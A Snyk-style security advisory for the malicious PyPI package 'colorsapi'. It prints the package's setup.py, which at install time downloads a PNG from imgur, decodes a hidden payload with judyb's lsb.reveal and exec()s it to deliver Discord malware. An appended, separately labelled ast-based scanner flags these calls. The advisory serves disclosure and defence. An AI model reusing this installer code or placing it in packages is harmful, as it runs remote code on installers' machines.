Malicious Package Affecting colorsapi package, versions [0,]


0.0
critical

Snyk CVSS

    Attack Complexity Low
    Confidentiality High
    Integrity High
    Availability High

    Threat Intelligence

    Exploit Maturity Mature

  • Snyk ID SNYK-PYTHON-COLORSAPI-3112353
  • published 11 Nov 2022
  • disclosed 11 Nov 2022
  • credit Raul Onitza-Klugman, Snyk

Introduced: 11 Nov 2022

Malicious CVE NOT AVAILABLE CWE-506
First added by Snyk

How to fix?

Avoid using all malicious instances of the colorsapi package.

Overview

colorsapi is a malicious package. This is a "dependency confusion" package: its name is based on existing repositories, namespaces, or components, and it aims to trick users into downloading a package that contains malicious code.

The malicious package injects Discord malware into Windows machines by injecting itself into the registry. The attack is initiated by downloading a malicious .png file, after which it downloads and executes a malicious Python script. The malicious code is heavily obfuscated, and the attack is multi-staged.

Malicious Code

The initial stage of the attack can be found in the setup.py file:

import os
from setuptools import setup, find_packages

try:
    import requests
    from judyb import lsb
except:
    os.system('pip install requests')
    os.system('pip install judyb')
    import requests
    from judyb import lsb

try:
    if os.path.exists(f'{os.getenv("TEMP")}\aRl53RS.png') != True:
        r = requests.get('https://i.imgur.com/aRl53RS.png')
        with open(f'{os.getenv("TEMP")}\aRl53RS.png', 'wb') as f:
            f.write(r.content)
        exec(lsb.reveal(f'{os.getenv("TEMP")}\aRl53RS.png'))
    else:
        r = requests.get('https://i.imgur.com/aRl53RS.png')
        with open(f'{os.getenv("APPDATA")}\aRl53RS.png', 'wb') as f:
            f.write(r.content)
        exec(lsb.reveal(f'{os.getenv("APPDATA")}\aRl53RS.png'))
except:
    pass
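
A defender-side check for the install-time behaviour shown above, as an added example that is not part of the advisory or of the package: it parses a setup.py with Python's ast module, without executing it, and reports the calls and imports this sample relies on. The function names, the rule table and the shortened SAMPLE input are assumptions constructed for illustration.

```python
import ast

# Assumed rule table: install-time behaviours present in the setup.py quoted above.
SUSPICIOUS_CALLS = {
    "exec": "executes dynamically produced code",
    "os.system": "runs a shell command during install",
    "requests.get": "fetches remote content during install",
    "lsb.reveal": "reads a payload out of an image file",
}
SUSPICIOUS_IMPORTS = {"judyb": "module the sample installs to decode the PNG"}

def dotted_name(node):
    """Return 'a.b' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    return ".".join(reversed(parts + [node.id])) if isinstance(node, ast.Name) else None

def scan_setup_py(source):
    """Return sorted (line, name, reason) findings; the source is parsed, never run."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        mods = []
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.add((node.lineno, name, SUSPICIOUS_CALLS[name]))
        elif isinstance(node, ast.ImportFrom):
            mods = [node.module or ""]
        elif isinstance(node, ast.Import):
            mods = [alias.name for alias in node.names]
        for root in {m.split(".")[0] for m in mods}:
            if root in SUSPICIOUS_IMPORTS:
                findings.add((node.lineno, root, SUSPICIOUS_IMPORTS[root]))
    return sorted(findings)

# Constructed sample: a shortened copy of the installer logic quoted above.
SAMPLE = """try:
    from judyb import lsb
except:
    os.system('pip install judyb')
r = requests.get('https://i.imgur.com/aRl53RS.png')
exec(lsb.reveal('aRl53RS.png'))
"""

if __name__ == "__main__":
    for finding in scan_setup_py(SAMPLE):
        print(finding)
```

Because the file is only parsed, the scan is safe to run on an unpacked sdist before any pip install, which is the point at which this setup.py would otherwise execute.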